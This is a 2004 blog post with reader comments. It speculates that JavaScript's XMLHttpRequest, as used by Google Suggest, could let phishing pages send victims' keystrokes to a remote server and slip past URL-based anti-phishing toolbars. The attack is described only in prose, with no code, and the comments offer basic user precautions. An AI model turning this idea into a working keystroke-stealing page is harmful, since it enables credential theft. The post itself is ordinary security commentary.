Thursday, December 30, 2004

Google Suggest and phishing attack

Google has a nice beta toy called Google Suggest, which guesses predictively as you enter search terms. What is interesting is the compact JavaScript on the page which communicates in real time with a Google server to generate the suggestions. The secret is the XMLHttpRequest object, used to communicate with a server and get new information or instructions without refreshing the page

I can see how such code could be used in a phishing attack: a phishing Web page, to which the user is directed via a fake email, can use similar JavaScript to transmit keystrokes to a remote server, even if the html post on the page submits the information (e.g., username and password) to the real authentication server. Anti-phishing technology which focuses on where the post data is sent (i.e., which is implemented on the firewall or TCP/IP level) will not detect a problem.

Anti-phishing technology like Whole Security's Web CallerID works by looking at the URL from which the potentially fake page is loaded. However, using the trick I've outlined above and some cross-site scripting the page can be served up from any number of locations - the only static component is the remote server where the keystrokes are sent. For an anti-phishing agent to detect this hack it would have to parse and understand the JavaScript on the fake page. Actually Web CallerID is weak for another reason - a phisher can use JavaScript to modify the "chrome" on the browser, replacing the Web CallerID toolbar with a fake one that gives the OK signal. (This is true for any toolbar.)

For those who don't follow Internet security, we are in the midst of a sea change right now. In the past, viruses and the like were built and released just for fun, for hackers to gain a reputation. We are now entering a period where much of the hacking is done by criminals for the purpose of financial gain. This means that the next virus on your machine may be more than just an annoyance - it may be watching while you log into your online banking account.


Anonymous said...


When you think through matters of computer-Internet security, please remark when appropriate on precautions that we may readily adopt. Thanks.


Steve Hsu said...

My advice:

1) stop using IE - switch to Mozilla/Firefox

2) never trust emails linking to bank/financial sites. Go directly to the site by typing the URL yourself.

3) install anti-virus software (e.g. Norton), and run it regularly.

4) if you can manage it, switch to OS X or Linux, because Windows is very insecure. If you stay with XP, download the patches regularly.

The problem is, the vast majority of users (e.g., my mother) will follow none of 1-4!

Blog Archive